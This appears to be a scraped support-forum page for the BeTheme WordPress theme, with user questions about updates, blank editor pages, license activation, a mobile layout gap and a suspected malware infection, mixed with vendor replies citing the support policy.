since version 20, all sliders comes with pre-built websites what means that you can easily import them from BeTheme > Pre-built websites section. More details about this process, you can find in the documentation.

I haven’t visited the back-end of my theme for a few months now. I just went in today and updated BeTheme to the latest version, and wpbakery as well. Now when I go to edit my pages the editor shows that they are all blank! The pages have content on them, but it no longer shows in the backend. What happened?

Hello, I was just wondering if there’s a new way to add the muffin builder on to the page builder for the custom post type. I did some search, and it appears that there’s supposed to be the meta-xxx.php files that I can use as a base? I can’t seems to find it in the ’/includes’ directory.

what you ask for, requires files customization what in reference to Item Support Policy is not allowed. So if you want to modify files and don’t know how, you should contact with your web developer. The policy says:
Item support does not include services to modify or extend the item beyond the original features, style and functionality described on the item page. For customization services that will help you tailor the item to your specific requirements, we recommend contacting the author to see if they privately offer paid customisation services or checking out the great service providers on Envato Studio.
P.S. We recommend to check some custom post type files that are located under /includes/ folder, like content-single-portfolio.php.

Not Activated so can’t see options on the side. Was fine until few days ago. What can I do please?
I have Version 5.4.8.3 and no option to Activate it only ‘Delete’ or ‘Update Required’ but when I try to update it won’t let me, presumably because 12 months has passed. Surely it should still work but just not allow for updates?

the error “The package could not be installed. The package contains no files.” means that you have not deregistered the website before moving. Please deregister it on both domains and register again on the new one. If this is not possible, then please send us access to your WP dashboard along with full purchase code that you have used for theme registration, so we can take a closer look.

For this site https://butlerbilt.net/, there is a large blank space under the slideshow on the mobile/responsive version and I cannot find what is making that gap. When you resize down on a desktop slowly, you can see it go from normal spacing to the major gap as you shrink the browser so it’s definitely tied to responsive handling. Can you please advise how to remove this annoying gap? Thank you.

So I am using your BeTheme on my WordPress host on sitegrounds. Your theme is infecting my web server every other day.
I did a test, after removing everything and wiping it clean. I did a fresh install of WordPress, installed BeTheme and activated the license. I didn’t touch anything else, didn’t upload anything, zero plugins. Literally the next day, I get notified that my server is infected again.
I spoke to the tech team of the web host, they can’t figure it out but they said it’s the plugins and theme that I am using. Funny thing is I didn’t have a single plugin installed.
Here is the malware code which is modifying the WordPress files and adding itself into the code. I honestly don’t know what to make of this anymore man.

both fonts are not available as free fonts and that’s why can not be included into Google fonts list. If you want to use them, you have to buy their licenses and upload as custom fonts.
